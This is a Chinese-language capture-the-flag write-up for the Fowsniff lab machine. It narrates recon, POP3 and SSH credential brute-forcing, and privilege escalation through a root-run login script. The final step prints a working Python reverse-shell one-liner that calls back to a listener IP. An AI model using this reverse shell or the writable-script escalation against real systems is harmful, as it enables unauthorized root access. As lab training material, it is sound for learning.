Fowsniff CTF
Hack this machine and get the flag.
0x01 信息收集
先用Nmap工具对目标进行端口服务探测
打开Web服务扫一遍目录没有发现有价值的线索。但分析端口应该突破口为110端口的邮箱服务。
搜索一下名为fowsniff的公司,第一条为推特
点进去能看到有个介绍说这个是靶场的一部分,随后贴了一个pastebin.com的链接。
跟随链接跳转可以访问到一个带有邮箱账号密码的文件
0x02 POP3
把获得的账号及MD5解密后的密码用msf的pop3暴力破解模块尝试登录(手工试了前面两个都不行)
设置配置选项
获得账号密码
登录邮箱,list查看到存在两封邮件
retr 1 读取第一封,里面有个临时密码S1ck3nBluff+secureshell。stone的吗?
不管了,直接用hydra跑一遍,秒出结果,改密码对应的账号为baksteen
0x03 提权
登录成功
到了提权环节,到处翻一翻找到一个cube.sh的文件,674权限users用户组可以写
是个抬头的页面,感觉应该是这个了,在/etc目录下搜索调用该文件的程序。grep -r /opt/cube/cube.sh
每当用户登录时便会以root权限调用执行该文件
0x04 反弹回ROOT Shell
把python反弹shell的代码插入到cube.sh中,一旦用户登录便能弹回root的shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.250.203",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
退出重新登录一下,登录前要用nc监听弹回shell的端口
成功弹回root权限的shell
获得flag